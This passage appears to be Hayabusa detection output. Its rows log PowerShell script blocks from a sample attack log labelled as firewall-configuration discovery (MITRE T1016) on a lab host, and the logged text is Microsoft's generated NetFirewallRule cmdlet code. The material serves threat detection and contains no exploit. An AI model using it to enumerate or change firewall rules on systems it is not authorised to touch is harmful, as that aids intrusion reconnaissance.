[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(Pa",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.676 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"rameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Direction') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Direction}) $__cmdletization_queryBuilder.FilterByProperty('Direction', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Action') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Action}) $__cmdletization_queryBuilder.FilterByProperty('Action', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EdgeTraversalPolicy') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EdgeTraversalPolicy}) $__cmdletization_queryBuilder.FilterByProperty('EdgeTraversalPolicy', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LooseSourceMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LooseSourceMapping}) $__cmdletization_queryBuilder.FilterByProperty('LooseSourceMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('LocalOnlyMapping') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyS",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.676 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"tore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.676 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Enable-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, 